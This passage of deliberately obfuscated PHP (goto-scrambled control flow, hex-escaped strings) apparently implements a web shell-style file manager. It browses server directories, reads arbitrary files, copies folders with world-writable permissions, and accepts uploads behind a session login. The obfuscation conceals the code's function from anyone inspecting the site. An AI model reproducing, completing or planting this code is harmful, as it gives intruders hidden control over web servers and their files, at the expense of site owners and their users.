Aem4n; ZouVM: echo $fZ6Lt[6]; goto xjuzN; qIRwx: $aBuS5 = isset($_GET["\141\154\x65\162\x74"]) ? $_GET["\x61\x6c\145\x72\x74"] : ''; goto iMqhG; xdaMh: $W7YOX[17] = "\x53\145\x6e\x64\151\156\x67\40\x2e\x2e\56"; goto AsNK_; xS_6G: echo $W7YOX[17]; goto y1fQ5; euHNx: if ($x5bhU > 0) { goto wN_UY; } goto FW3FX; BiLV_: echo "\74\x21\x44\117\103\124\131\x50\105\40\x68\x74\155\154\x3e\xd\xa\74\x68\x74\x6d\154\40\x6c\x61\156\147\75\x22\x65\156\55\125\123\42\x3e\xd\xa\40\40\x20\x20\x3c\150\x65\x61\x64\x3e\11\xd\xa\x9\40\x20\x20\40\x3c\x6d\145\164\141\x20\143\x68\141\x72\x73\x65\164\x3d\x22"; goto puzQT; G22F3: echo $fZ6Lt[4]; goto s4AwN; VU7jJ: $fZ6Lt[3] = "\144\141\164\141\72\x69\155\x61\147\145\x2f\x70\x6e\x67\x3b\x62\141\163\x65\66\64\x2c\x69\x56\102\117\x52\x77\60\113\107\147\157\101\x41\101\101\116\123\x55\x68\105\x55\x67\101\101\x41\102\x41\101\x41\101\101\121\x43\101\131\101\101\x41\x41\146\x38\x2f\71\x68\x41\x41\x41\x41\x64\x55\154\x45\121\x56\x51\x34\152\x65\x32\123\162\x51\x32\101\121\x42\x53\104\62\121\x42\x43\143\x4f\x77\105\162\x41\x4f\161\64\x76\x53\61\x44\71\122\x4a\x70\155\101\x39\106\x49\114\x6b\117\x48\66\x43\x51\x4e\x43\x6b\x70\x6b\x6d\x2f\x56\x44\x54\114\x50\151\x48\166\146\x55\x73\123\105\130\145\130\101\x47\131\x32\170\156\112\112\115\64\x44\151\x46\105\x41\x53\x73\144\x77\65\126\65\x76\x5a\105\x6c\163\x6e\141\x51\x42\x51\x4a\121\105\x70\x68\122\102\171\123\x63\x4e\x6a\x77\x4b\x37\63\x41\61\64\101\123\112\162\165\x6c\147\105\x55\112\120\x73\x4e\60\102\x78\x63\x4f\x65\x55\x65\121\x50\x6c\x6b\53\142\164\x61\x41\125\132\x49\x62\x2f\x50\x6e\127\152\x4e\x37\101\101\x41\x41\101\x45\x6c\x46\x54\x6b\123\x75\121\155\103\x43"; goto CYnwZ; PrdKo: function KewCZ($apBuP, $bFEs0) { goto Pm46h; LBcQQ: goto mvSVA; goto B5CJQ; YB8cX: yI89Q: goto UoqO0; JzRZN: $eKaQO = pathinfo($bFEs0, PATHINFO_DIRNAME); goto uYmh5; B5CJQ: oH54j: goto DKpha; O5BEg: $g7ThV = opendir($apBuP); goto sHduf; UoqO0: return @copy($apBuP, $bFEs0); goto v1oE7; tNfMm: qt4Ob: goto xZGMN; S67Sz: kEWcZ($apBuP . "\57" . $f4vjY, $bFEs0 . "\57" . $f4vjY); goto M9XEP; sHduf: if (file_exists($bFEs0)) { goto qt4Ob; } goto JWCVp; DTco4: goto dbt1w; goto wXmRS; uYmh5: if (file_exists($eKaQO)) { goto yI89Q; } goto hFR9E; Pm46h: if (!is_file($apBuP)) { goto s8rZa; } goto JzRZN; R5mjH: B8DmY: goto LBcQQ; XcKeF: copy($apBuP . "\57" . $f4vjY, $bFEs0 . "\57" . $f4vjY); goto DTco4; wXmRS: xzywt: goto S67Sz; JWCVp: @mkdir($bFEs0, 0777, true); goto tNfMm; q4lsO: if (!(false !== ($f4vjY = readdir($g7ThV)))) { goto oH54j; } goto mWLcF; DKpha: closedir($g7ThV); goto I3x7V; xZGMN: mvSVA: goto q4lsO; qsdjc: if (is_dir($apBuP . "\57" . $f4vjY)) { goto xzywt; } goto XcKeF; M9XEP: dbt1w: goto R5mjH; mWLcF: if (!($f4vjY != "\56" && $f4vjY != "\56\x2e")) { goto B8DmY; } goto qsdjc; hFR9E: @mkdir($eKaQO, 0777, true); goto YB8cX; v1oE7: s8rZa: goto O5BEg; I3x7V: } goto B1w0D; iOefu: function fIW9G() { goto BwKbk; YVbJu: $ZG4zG = "\x2e"; goto qLNZ_; SvWNo: JEGL8: goto XTL4h; qLNZ_: $DeDql = explode("\x2f", $Lfznb); goto AwvX2; BwKbk: global $Lfznb, $x5bhU, $W7YOX; goto r3zd8; r3zd8: $nY7pD = "\x3c\x6c\x69\x3e\x3c\x61\40\x68\162\145\146\75\x22\43\42\x20\x6f\x6e\143\154\151\143\153\75\42\x67\x65\x74\x43\x6f\156\164\145\156\x74\x28" . "\47\144\151\162\x3d\x2e" . "\47" . "\54\x30\51\73\x20\162\145\164\165\x72\x6e\x20\x66\x61\x6c\x73\145\x3b\42\x3e" . $W7YOX[4] . "\x3c\57\141\x3e\x3c\57\x6c\x69\x3e"; goto YVbJu; nZbke: QyOo1: goto SvWNo; AwvX2: if (!(is_array($DeDql) || is_object($DeDql))) { goto JEGL8; } goto K_drO; K_drO: foreach ($DeDql as $NjkMT) { goto oNHIJ; oNHIJ: if (!($NjkMT != "\56")) { goto DrINE; } goto H2bp4; JiC3X: $nY7pD .= "\x3c\x6c\x69\76\x3c\141\x20\150\x72\x65\146\x3d\42\43\42\40\157\x6e\143\154\151\143\153\75\42\147\x65\164\103\x6f\156\x74\145\156\x74\50" . "\47\x64\151\162\75" . $ZG4zG . "\x26\x70\x61\147\145\x3d" . $x5bhU . "\x27" . "\54\60\x29\x3b\x20\162\x65\x74\165\x72\x6e\40\146\x61\154\x73\x65\x3b\42\76" . $NjkMT . "\x3c\57\141\76\x3c\x2f\154\x69\x3e"; goto Z7cs3; H2bp4: $ZG4zG = $ZG4zG . "\x2f" . $NjkMT; goto JiC3X; uUDYL: xqaeP: goto dI6WA; Z7cs3: DrINE: goto uUDYL; dI6WA: } goto nZbke; XTL4h: return $nY7pD; goto Fu8sj; Fu8sj: } goto hmd40; cB0Po: $W7YOX[12] = "\142\x79"; goto IaFCa; uD08g: echo $W7YOX[19]; goto sNQps; q0jup: Rq0lb: goto G9yjK; hmd40: function oWhjL($yDhsM) { goto TsSTn; TsSTn: global $XVQVq; goto v4YrJ; R0buc: return "\x2d\55"; goto X5a7V; Yuic8: return number_format($uZUUj / pow(1024, $Ni4MB), 2, "\56", "\54") . "\40" . $XVQVq[$Ni4MB]; goto d61A7; OUqGN: $uZUUj = filesize($yDhsM); goto Yf_FS; X5a7V: K4QkH: goto OUqGN; v4YrJ: if (!(is_dir($yDhsM) || $yDhsM == "\56\57\115\x61\164\x63\x68\x5f\x6e\x6f\164\x5f\x66\157\165\x6e\144")) { goto K4QkH; } goto R0buc; Yf_FS: $Ni4MB = $uZUUj > 0 ? floor(log($uZUUj, 1024)) : 0; goto Yuic8; d61A7: } goto czw94; vhaII: iRi03: goto zZ5uR; cUT3j: echo "\x3c\57\x61\76\x3c\57\154\151\76\15\12\x9\40\40"; goto xV2No; dpz3E: function Yylni() { goto koqCu; MjvK1: return false; goto xqY6r; bk5lr: if (isset($_SESSION["\x6c\x6f\x67\x69\156"])) { goto hBaMF; } goto SVbBI; UhXVs: goto jstnb; goto atNrB; MriO_: C2TP4: goto x0CXO; SVbBI: return false; goto UhXVs; atNrB: hBaMF: goto y8r5j; XwmmU: njUY7: goto Uwksc; xqY6r: goto njUY7; goto MriO_; koqCu: global $Q9vLm, $X_irx; goto bk5lr; Uwksc: jstnb: goto ZY2xg; x0CXO: return true; goto XwmmU; y8r5j: if ($_SESSION["\x6c\x6f\147\151\156"]["\x75\x73\145\162"] == $Q9vLm && $_SESSION["\x6c\x6f\x67\x69\156"]["\x70\x61\x73\163"] == $X_irx && $_SESSION["\154\x6f\147\151\x6e"]["\x73\164\x61\164\x75\163"] == "\x31") { goto C2TP4; } goto MjvK1; ZY2xg: } goto uaxSz; WkR3k: echo $W7YOX[26]; goto cUT3j; tudl5: hzI9R(1); goto Tdf3P; IE9Tx: goto q6CMN; goto KYVvW; w8PlE: $W7YOX[8] = "\101\143\164\x69\157\156\163"; goto K9SWM; xfAop: echo "\51\40\x6e\x6f\55\x72\145\x70\x65\x61\164\40\154\145\x66\x74\x20\x63\x65\x6e\164\145\x72\x3b\x20\160\x61\144\144\151\x6e\147\x3a\40\65\160\170\40\x30\40\x35\160\x78\40\62\x35\x70\x78\x3b\155\141\162\147\151\156\x2d\154\x65\146\164\72\40\65\x70\170\73\x7d\15\12\56\x43\157\160\171\x49\143\157\x6e\40\173\x62\141\x63\x6b\147\162\157\165\x6e\x64\x3a\165\x72\x6c\50"; goto SryOC; Ymtme: echo "\x3c\x2f\x62\165\x74\x74\157\x6e\76\40\xd\12\x9\x9\x20\40\x3c\142\x75\x74\164\157\x6e\40\x74\171\x70\145\x3d\42\142\165\x74\x74\x6f\156\42\40\143\x6c\141\163\x73\x3d\42\x62\164\156\40\x62\164\x6e\55\x64\145\146\141\x75\154\164\42\x20\x64\141\164\x61\55\144\x69\x73\x6d\x69\163\163\x3d\x22\x6d\157\144\x61\x6c\42\76"; goto xAzhV; JQMbb: $ksrpy = isset($_POST["\x74\x78\x74"]) ? $_POST["\164\x78\164"] : ''; goto zcWnP; hNF2A: unset($r2sBB); goto xEOhV; anvXi: echo "\x3c\57\142\165\164\164\x6f\156\x3e\xd\xa\11\11\x20\15\xa\x9\x20\x3c\57\144\151\x76\x3e\xd\xa\40\40\40\x20\x3c\x2f\144\151\166\x3e\15\12\xd\xa\x20\x20\x3c\x2f\x64\x69\x76\76\15\12\74\57\144\x69\166\x3e\11\15\xa\15\12\xd\xa\15\12\x3c\x21\55\55\40\x4d\x6f\x64\141\154\x20\x52\x65\155\157\166\145\x20\55\55\x3e\15\12\74\x64\x69\166\x20\x69\144\75\x22\x5a\151\160\106\151\x6c\145\x22\x20\x63\154\141\163\163\75\42\155\x6f\144\141\154\x20\146\141\144\x65\42\x20\x72\157\x6c\x65\75\x22\x64\151\141\154\x6f\147\x22\x3e\xd\xa\40\40\x3c\144\151\x76\40\x63\x6c\x61\163\163\75\x22\155\x6f\144\141\x6c\55\144\x69\x61\154\157\x67\42\76\xd\xa\15\12\x20\40\x20\x20\x3c\x21\x2d\x2d\x20\x4d\x6f\x64\x61\x6c\x20\143\x6f\x6e\x74\x65\x6e\x74\55\55\x3e\xd\xa\40\40\x20\x20\74\144\x69\x76\x20\143\154\141\163\163\75\42\x6d\157\144\x61\154\55\x63\x6f\156\164\145\156\x74\42\76\xd\12\x20\x20\x20\x20\40\40\x3c\144\151\x76\40\x63\154\x61\163\x73\x3d\42\x6d\x6f\x64\x61\154\55\150\145\x61\x64\x65\162\42\76\15\xa\x20\x20\x20\x20\40\40\x20\40\x3c\x62\x75\x74\x74\x6f\156\x20\164\x79\160\x65\75\42\142\x75\x74\164\157\x6e\x22\40\x63\154\x61\163\x73\x3d\42\143\x6c\157\x73\145\42\40\144\x61\x74\141\x2d\x64\151\163\155\x69\163\163\x3d\x22\155\x6f\144\x61\x6c\42\76\x26\164\x69\155\x65\163\x3b\74\x2f\x62\165\164\164\x6f\x6e\x3e\15\xa\40\40\x20\x20\x20\x20\40\40\74\150\x34\40\x63\x6c\141\163\x73\x3d\42\x6d\157\x64\x61\154\55\164\151\164\154\x65\42\x3e"; goto GDQvA; xgHQE: unset($W7YOX); goto XcLZ6; JoD5R: echo "\74\x2f\142\165\x74\164\157\156\x3e\15\12\11\11\x20\xd\12\x9\40\x3c\57\144\151\x76\x3e\xd\12\40\x20\40\x20\74\57\x64\151\166\76\15\xa\15\12\x20\40\74\x2f\x64\x69\166\x3e\xd\12\74\57\144\151\x76\76\11\xd\xa\xd\xa\x3c\x21\55\55\x20\x4d\157\144\x61\154\40\103\157\160\x79\106\157\154\x64\x65\x72\x20\55\55\x3e\15\12\x3c\x64\x69\166\40\x69\x64\75\42\x43\x6f\160\x79\x46\x6f\154\144\x65\x72\42\40\x63\x6c\x61\x73\163\x3d\42\x6d\157\144\141\x6c\40\146\141\x64\x65\x22\40\x72\157\154\145\75\42\x64\151\141\x6c\x6f\147\x22\76\15\12\x20\40\74\x64\151\166\x20\143\154\x61\x73\163\x3d\42\155\x6f\x64\x61\154\x2d\x64\151\x61\x6c\x6f\147\42\x3e\15\xa\15\12\x20\x20\x20\x20\74\x21\55\55\x20\x4d\157\x64\x61\x6c\40\x63\157\x6e\x74\x65\x6e\x74\55\55\x3e\xd\12\40\x20\x20\40\74\144\x69\x76\x20\143\x6c\x61\163\163\x3d\x22\x6d\x6f\144\x61\154\x2d\x63\157\156\x74\x65\x6e\164\42\x3e\15\12\40\x20\40\x20\x20\x20\x3c\x64\151\166\40\x63\x6c\141\163\x73\x3d\x22\x6d\x6f\x64\141\154\x2d\x68\x65\x61\144\145\162\42\x3e\xd\12\x20\40\x20\40\40\x20\40\40\74\142\x75\x74\x74\157\156\x20\164\171\160\145\75\x22\x62\x75\164\x74\x6f\x6e\42\x20\x63\x6c\141\x73\x73\75\42\143\x6c\157\163\x65\x22\40\x64\141\x74\x61\55\144\x69\163\155\151\163\x73\75\42\x6d\157\144\141\x6c\42\76\46\164\x69\x6d\x65\x73\73\74\57\142\165\164\x74\x6f\x6e\76\xd\xa\x20\x20\40\40\x20\40\40\x20\74\x68\x34\x20\x63\x6c\x61\163\163\x3d\x22\x6d\157\x64\141\x6c\x2d\x74\x69\164\154\x65\x22\76"; goto HgIFv; hyll5: function iwWPP($f4vjY, $kyoOG = "\x72") { goto CEtl7; KGO6j: LIx1Z: goto vHPfA; vHPfA: return fread($GBmS7, $sGVBQ); goto IjoyK; z18b5: $GBmS7 = fopen($f4vjY, $kyoOG); goto KgCzL; EgzB6: return $W7YOX[21]; goto KGO6j; TYA2r: $sGVBQ = filesize($f4vjY); goto yhlEJ; XEWa7: return $W7YOX[21]; goto v87KM; yhlEJ: if (!(!$sGVBQ || !is_readable($f4vjY))) { goto qTUVq; } goto XEWa7; CEtl7: global $W7YOX; goto TYA2r; v87KM: qTUVq: goto z18b5; IjoyK: fclose($GBmS7); goto bKMPb; KgCzL: if ($GBmS7) { goto LIx1Z; } goto EgzB6; bKMPb: } goto Qy6qy; fICSz: echo $W7YOX[11] . "\x3c\x73\x70\141\156\x20\143\x6c\x61\x73\163\x3d\42\x68\x69\x64\144\x65\156\x2d\170\x73\42\76\40\54\x20" . $W7YOX[12] . "\40\x20" . base64_decode("\120\107\116\x76\x5a\107\125\53\142\62\65\154\145\107\x6c\x30\132\124\167\x76\131\62\71\153\132\124\64\x3d") . "\40\40"; goto CH3vw; txppW: echo "\x3c\x2f\141\x3e\x3c\57\x6c\x69\x3e\11\x20\x20\xd\xa\x9\40\x20"; goto DpNlm; SFktQ: HZi9R(1); goto d6nH9; qX6Qq: function SdOzH($c9xxC) { global $W7YOX; return "\x3c\144\x69\166\x20\143\x6c\x61\163\163\x3d\42\x61\154\x65\x72\x74\x20\141\154\145\162\x74\x2d\144\x61\156\147\145\162\x22\76\74\x61\x20\150\x72\145\146\x3d\42\43\42\40\x63\154\x61\x73\163\x3d\42\143\x6c\157\163\145\42\x20\144\141\164\141\55\x64\x69\163\155\x69\163\163\x3d\x22\x61\154\145\162\164\x22\x20\141\162\151\x61\55\x6c\x61\142\145\x6c\x3d\x22\x63\154\x6f\x73\145\x22\76\46\x74\151\155\x65\x73\x3b\74\x2f\x61\76\74\x73\164\x72\x6f\x6e\x67\x3e" . $W7YOX[33] . "\x21\74\x2f\163\164\x72\x6f\156\x67\x3e\40" . $c9xxC . "\x3c\x2f\x64\x69\166\76"; } goto wrzSx; t2UlJ: hZi9r(); goto bUMqa; zttvH: echo $W7YOX[29]; goto HmENJ; nww7S: mXrhI: goto Rt60m; NXfI8: cUlJt: goto ysbtZ; cetl3: HzI9R(1); goto cDWtN; ttya7: $RYKLz = array("\x61\x72", "\x61\x72\x63", "\142\x63\x63", "\142\x71\151", "\143\x6b\x62", "\144\x76", "\146\x61", "\147\154\x6b", "\150\145", "\154\162\x63", "\x6d\x7a\156", "\160\x6e\x62", "\x70\163", "\x73\x64", "\165\x67", "\165\162", "\x79\x69"); goto GmUZH; ydn2M: $x6_fq = W58tw($Lfznb); goto JXN3_; we97I: $W7YOX[39] = "\124\162\145\x65\40\126\x69\145\167"; goto S9pur; eTdmR: $x5bhU = isset($_GET["\160\x61\x67\145"]) ? (int) $_GET["\160\141\147\145"] : 1; goto euHNx; KysTr: echo $W7YOX[17]; goto h2vCt; CFvyz: Usylv: goto sbY5B; MfIrN: echo $W7YOX[18]; goto mrBDM; Q5vw_: if (!isset($_GET["\x73\x65\141\x72\143\150"])) { goto pA47X; } goto kSQJF; K9SWM: $W7YOX[9] = "\x50\141\x67\x65"; goto v4VT5; FGeA0: echo "\x20\x20\47\x2b\146\x6f\162\155\141\164\x46\151\x6c\x65\123\x69\x7a\145\50\155\x61\x78\106\x69\154\x65\123\x69\172\145\x29\40\x29\x3b\15\xa\x9\11\x9\11\x9\11\x9\11\x24\50\x22\x23\106\x69\x6c\x65\125\160\154\157\x61\144\102\164\x6e\42\x29\56\x61\x74\x74\162\x28\x22\x64\151\x73\141\x62\154\x65\144\42\x2c\x20\x22\x64\151\163\x61\142\x6c\x65\144\42\x29\73\xd\12\x9\x9\11\x9\x9\x9\x9\x7d\40\x65\154\163\145\40\44\x28\x27\x23\106\151\x6c\145\125\x70\154\157\141\144\x4c\x61\142\x65\x6c\x73\165\x63\143\x65\163\163\47\x29\x2e\x68\x74\155\x6c\50\47\x27\x29\x3b\15\12\x9\x9\x9\11\x9\x9\11\15\12\11\x9\11\11\x9\x9\x9\15\xa\11\11\x9\11\x9\11\175\xd\12\x9\x9\11\11\11\11\40\40\xd\12\x9\x9\11\11\11\x9\xd\12\11\11\x9\x9\11\11\xd\xa\x9\11\x9\11\x9\x9\x7d\x29\73\x20\11\15\xa\x9\x9\11\11\11\11\xd\12\11\x9\x9\15\xa\x9\x9\11\x24\x28\x22\43\143\157\x6e\x74\x65\x6e\x74\x22\51\x2e\x68\164\155\154\x28\114\x6f\x61\x64\x69\x6e\x67\x48\164\x6d\154\x29\x3b\15\12\x9\11\x20\x20\x20\40\x20\x24\56\147\x65\x74\x4a\123\117\116\x28\42\x3f\164\x61\142\x6c\145\x26\160\141\x67\145\75\61\42\54\x20\146\165\x6e\x63\164\x69\x6f\x6e\x28\162\145\x73\165\154\164\x29\173\x20\15\xa\11\x9\11\44\x28\42\x23\143\x6f\156\x74\145\x6e\x74\x22\51\56\x68\164\x6d\154\x28\162\x65\163\165\154\x74\56\164\x61\142\x6c\x65\x29\x3b\40\xd\xa\11\x9\x20\x20\x20\40\x24\50\47\x23\x62\162\145\141\144\x63\162\165\155\142\x27\x29\x2e\x68\164\155\154\x28\x72\x65\x73\x75\154\164\x2e\144\x69\x72\x48\164\155\154\51\73\15\12\11\x9\x9\44\50\47\43\x64\151\x72\x65\143\164\157\162\171\x27\51\x2e\x76\141\154\x28\162\x65\x73\165\154\164\x2e\144\x69\x72\51\73\15\xa\40\40\x20\40\40\x20\40\40\x20\40\40\x20\x2f\57\x20\x69\156\x69\x74\x20\x62\x6f\x6f\x74\160\x61\x67\x20\x2d\x73\x6d\xd\12\11\x9\11\44\50\47\43\x61\154\x65\x72\164\x27\x29\x2e\150\x74\155\154\50\162\x65\163\x75\154\x74\x2e\x61\x6c\x65\x72\x74\x29\x3b\xd\xa\x9\x9\x9\xd\12\11\x9\x9\40\x24\50\x27\43\x70\141\147\x69\x6e\141\x74\151\157\x6e\x27\51\x2e\x74\x77\142\x73\120\141\x67\x69\x6e\x61\x74\x69\x6f\x6e\50\x7b\15\xa\40\x20\x20\x20\40\40\x20\40\164\x6f\x74\141\154\x50\141\x67\145\163\72\x20\x72\x65\x73\x75\154\164\x2e\164\x6f\164\x61\154\x2c\15\12\x20\40\x20\x20\40\40\40\x20\x76\151\163\x69\142\154\145\x50\141\147\145\x73\72\40\x35\x2c\xd\12\11\x9\146\151\162\163\164\x20\72\40\47"; goto xl46E; TSBgK: function Mr44W($g7ThV) { goto B9yuX; lZP6I: Y6L0B: goto ohHV_; ohHV_: return $uZUUj; goto vU1o8; B9yuX: $uZUUj = 0; goto SJiPB; SJiPB: foreach (glob(rtrim($g7ThV, "\57") . "\x2f\x2a", GLOB_NOSORT) as $XxNMC) { $uZUUj += is_file($XxNMC) ? filesize($XxNMC) : MR44W($XxNMC); zLrKP: } goto lZP6I; vU1o8: } goto aHRm5; AKvwv: die($W7YOX[7]); goto YjmSt; bSsIs: unset($TG6CH); goto FxXco; ViDsj: goto RJ1gE; goto Qljlm; QIIfi: unset($TdtK7); goto iPxks; i7XaU: hZI9r(1); goto fb_2q; R2ajM: UGn4Q: goto ibhBV; e1ALr: $W7YOX[30] = "\x55\160\x6c\x6f\x61\144\x20\x66\x69\154\145"; goto DAwNZ; YAgyE: echo $fZ6Lt[1]; goto xfAop; oRQmp: echo "\x3c\x2f\x62\165\164\x74\157\156\x3e\xd\12\11\11\x20\15\12\x9\40\x3c\57\144\x69\166\76\xd\xa\40\x20\40\x20\74\x2f\x64\151\x76\x3e\xd\xa\xd\xa\x20\40\74\57\144\x69\x76\x3e\15\12\x3c\57\x64\151\166\76\11\xd\xa\xd\12\xd\12\15\xa\x3c\41\x2d\x2d\40\115\157\x64\x61\154\40\x52\x65\x6d\x6f\x76\x65\40\55\x2d\76\xd\xa\x3c\x64\x69\166\40\151\x64\75\x22\122\145\x6d\157\166\145\42\x20\x63\154\141\x73\163\75\42\x6d\x6f\144\x61\154\40\x66\141\x64\x65\42\x20\x72\157\x6c\145\x3d\x22\x64\x69\141\x6c\157\x67\42\x3e\xd\12\40\x20\x3c\x64\151\166\40\x63\154\x61\163\163\75\42\155\x6f\x64\x61\x6c\x2d\x64\x69\x61\154\157\x67\x22\x3e\15\12\15\12\40\40\x20\x20\x3c\41\x2d\55\40\x4d\157\144\141\154\x20\143\x6f\156\164\x65\x6e\164\55\x2d\76\15\12\x20\x20\40\40\74\x64\x69\x76\40\143\154\x61\163\163\x3d\x22\x6d\157\144\x61\154\x2d\143\157\156\164\145\156\164\x22\x3e\xd\xa\x20\x20\x20\40\40\40\x3c\144\151\x76\40\143\x6c\141\163\163\x3d\42\155\157\x64\141\154\55\x68\x65\141\x64\x65\162\42\76\xd\xa\40\40\x20\40\x20\x20\x20\x20\74\x62\165\x74\x74\x6f\x6e\40\164\171\x70\x65\x3d\x22\142\165\x74\164\x6f\156\x22\x20\143\x6c\x61\x73\163\75\42\x63\x6c\x6f\x73\x65\x22\40\x64\x61\164\x61\x2d\144\x69\x73\x6d\x69\163\163\x3d\x22\x6d\x6f\x64\x61\154\42\76\x26\164\x69\155\145\163\73\x3c\57\142\165\164\164\x6f\156\x3e\xd\12\x20\x20\40\x20\x20\40\x20\40\x3c\150\64\40\143\x6c\x61\x73\163\x3d\42\x6d\x6f\144\141\154\x2d\164\151\x74\x6c\145\42\76"; goto GU0Wb; ijpu0: if (!(isset($_GET["\x75\x70\154\157\x61\x64\x66\151\154\x65"]) && Kd9YA())) { goto mzVjq; } goto lYyC7; fUpQ3: echo $W7YOX[15]; goto JoD5R; qeMxQ: echo "\x3c\x2f\x62\x75\x74\x74\157\x6e\76\xd\12\x20\x20\40\40\40\40\x20\x20\74\142\x75\164\164\157\x6e\x20\164\171\160\145\75\x22\142\165\x74\x74\x6f\156\42\40\x63\x6c\x61\163\163\75\x22\142\164\x6e\x20\142\x74\156\55\x64\x65\146\x61\x75\x6c\x74\42\40\144\x61\164\x61\55\x64\x69\163\155\x69\163\x73\x3d\x22\155\157\x64\141\154\42\76"; goto ciUo4; aUBgn: $fZ6Lt[14] = "\x64\x61\164\x61\72\x69\x6d\141\147\x65\x2f\x70\156\147\x3b\142\x61\163\145\x36\64\x2c\x69\x56\102\x4f\122\167\x30\x4b\107\147\157\x41\x41\x41\x41\x4e\x53\125\x68\x45\125\147\x41\101\x41\x42\101\101\101\x41\101\121\103\x41\131\x41\101\101\x41\x66\x38\x2f\71\150\101\x41\101\101\x77\153\x6c\105\121\126\x51\64\x6a\142\62\121\120\x51\162\x43\x51\102\103\106\106\x79\x76\170\x42\164\x59\113\x75\x59\x4f\x56\x6e\132\63\x6e\x43\x46\67\102\132\160\x73\125\x47\71\151\144\71\66\142\114\104\124\171\x44\154\141\x57\x6e\105\107\x7a\x74\x30\x78\154\x69\112\x59\123\167\x4a\117\166\x76\147\x39\x63\115\172\x50\146\145\x6a\x44\x47\x2f\125\154\105\125\143\65\x4b\65\151\117\167\102\x62\111\167\x78\x6b\x2b\122\x6c\101\106\x73\x41\x74\x61\161\x32\x54\167\x4d\64\x56\154\x55\x31\x53\x30\x6f\x47\125\112\x4d\70\x4f\x2b\x63\x79\x61\x2b\x30\x55\167\111\x35\x6b\x51\71\113\x50\x41\x6b\152\155\x71\164\157\x36\x35\67\112\145\x71\167\120\x4a\62\x79\x68\101\122\113\x79\x71\x74\161\x6e\172\x37\x77\111\101\x42\x4a\x4a\116\71\63\154\71\153\67\171\107\105\112\132\122\121\107\171\x5a\x35\x45\x6c\105\142\116\146\145\x2b\x31\x55\x55\115\112\x54\x63\164\x59\152\131\132\105\x43\163\147\131\151\163\x2f\x77\x64\x34\x36\131\x53\120\156\170\150\103\113\x41\110\143\150\71\111\x42\x58\x4d\x71\171\x58\x45\x51\x42\x37\53\x67\102\164\111\x45\155\126\127\160\x33\x72\141\x41\x41\101\x41\x41\101\x53\125\126\x4f\122\x4b\65\103\131\111\x49\75"; goto KMMvP; Pj2TO: goto iV0db; goto Kbx8s; fb_2q: echo "\42\x3e\x3c\57\163\160\x61\x6e\x3e\40\15\xa\11\40\40\40\40\x3c\142\165\164\164\157\156\40\40\164\171\x70\x65\75\x22\x62\165\x74\x74\157\x6e\42\x20\x63\x6c\x61\163\x73\75\x22\x62\x74\156\x20\142\164\x6e\55\163\x75\x63\143\x65\163\x73\42\x20\40\x6f\156\x63\154\x69\143\x6b\x3d\42\x6e\x65\167\x66\157\x6c\144\x65\162\101\156\x64\103\x6f\x6e\x74\x65\156\x74\x28\51\x22\76"; goto S5N8R; EC5rH: $fZ6Lt[8] = "\144\x61\164\141\x3a\151\155\141\x67\x65\57\x70\156\x67\73\142\x61\163\145\66\x34\54\x69\126\x42\117\122\x77\x30\x4b\x47\147\157\x41\101\101\101\x4e\x53\125\150\105\125\147\101\x41\x41\102\101\101\x41\101\101\x51\103\x41\x59\101\101\x41\x41\146\x38\57\71\150\101\101\x41\101\154\105\x6c\x45\121\x56\x51\64\x6a\x57\116\x67\x6f\103\x5a\x6f\141\107\147\121\x6d\x54\102\150\x51\154\126\57\x66\x33\x38\x44\x4f\155\65\x70\141\132\105\x6d\x61\115\x43\105\103\x52\x4f\x71\x79\x73\162\x4b\145\116\110\x46\x2b\x2f\x76\67\x47\171\132\117\x6e\120\x69\x6c\157\141\107\102\x42\66\70\x42\57\146\63\71\104\x54\101\x61\103\124\166\60\71\x2f\x63\x33\x51\106\61\x33\x66\x64\127\x71\126\143\167\x45\104\x63\101\x69\130\164\63\x51\60\x4d\104\130\60\71\x4f\152\115\x57\x48\103\150\x4d\x55\153\165\x36\103\164\162\x55\62\60\166\67\53\x2f\107\x75\161\126\x41\66\x51\141\x67\x4f\x45\x64\x6b\x72\61\101\164\102\161\x71\165\127\x44\125\x43\170\x52\64\131\143\113\105\x43\130\64\x54\x4a\x30\x36\x63\147\163\143\x46\104\x52\x4d\156\x54\166\170\107\x79\x42\x4b\x53\x41\101\x44\x61\x74\163\64\x63\x4d\164\x55\x6e\104\x41\x41\x41\x41\101\102\112\122\x55\65\x45\x72\153\112\x67\147\x67\75\x3d"; goto NvRgr; t9RTP: unset($OQWkJ); goto hsxqr; l8rSW: $KjPGL = $x6_fq["\164\x69\x6d\x65\163"]; goto Bz5J5; OJg2b: unset($_FILES); goto b5SlW; aeydW: echo "\74\x2f\142\165\x74\x74\x6f\x6e\x3e\15\xa\xd\xa\40\x20\x20\40\x20\40\40\x20\74\57\x66\157\x72\x6d\76\15\xa\11\x9\15\xa\11\40\74\57\x64\151\x76\x3e\xd\12\11\xd\xa\x20\x20\x20\40\x3c\57\x64\151\x76\x3e\15\12\xd\12\40\x20\74\57\x64\x69\166\x3e\15\xa\74\57\x64\x69\x76\76\x9\15\12\15\12\40\x3c\144\x69\x76\40\x63\154\141\x73\163\x3d\42\x6d\157\144\x61\x6c\40\146\141\x64\x65\x22\x20\x69\144\x3d\42\x53\150\x6f\x77\106\x69\x6c\x65\42\40\162\157\154\145\x3d\x22\144\x69\141\154\x6f\x67\42\76\xd\12\40\40\40\40\x3c\144\151\x76\x20\143\154\141\163\x73\x3d\42\x6d\x6f\144\x61\154\55\144\151\x61\x6c\x6f\147\42\x3e\15\xa\x20\40\40\40\15\12\x20\x20\40\40\40\40\x3c\x21\55\x2d\40\115\157\x64\x61\154\x20\143\157\x6e\164\145\156\x74\55\x2d\76\xd\12\x20\40\40\40\40\x20\x3c\144\x69\166\40\143\154\141\163\163\x3d\x22\155\157\144\141\154\55\143\157\x6e\164\145\x6e\x74\42\x3e\xd\xa\x20\x20\x20\40\x20\x20\x20\x20\x3c\x64\151\166\40\x63\154\141\x73\163\75\x22\155\157\144\141\154\55\x68\x65\x61\x64\x65\x72\42\x3e\15\xa\40\40\x20\x20\x20\x20\40\x20\x20\40\x3c\x62\165\164\164\x6f\156\x20\164\x79\160\145\75\x22\142\165\164\164\157\x6e\42\40\x63\154\141\x73\163\75\42\143\x6c\x6f\163\x65\x22\x20\144\141\x74\x61\55\144\151\163\x6d\x69\x73\x73\75\x22\155\157\x64\x61\154\x22\x3e\x26\164\151\155\x65\x73\73\74\57\x62\x75\x74\164\157\156\x3e\xd\xa\40\x20\x20\x20\40\x20\x20\40\40\40\74\x68\64\x20\x63\154\141\163\x73\75\x22\155\157\x64\141\154\x2d\164\151\164\154\x65\42\76"; goto IIW1U; AKTMG: echo $W7YOX[6]; goto p8z6I; k2_wC: aWxxy: goto 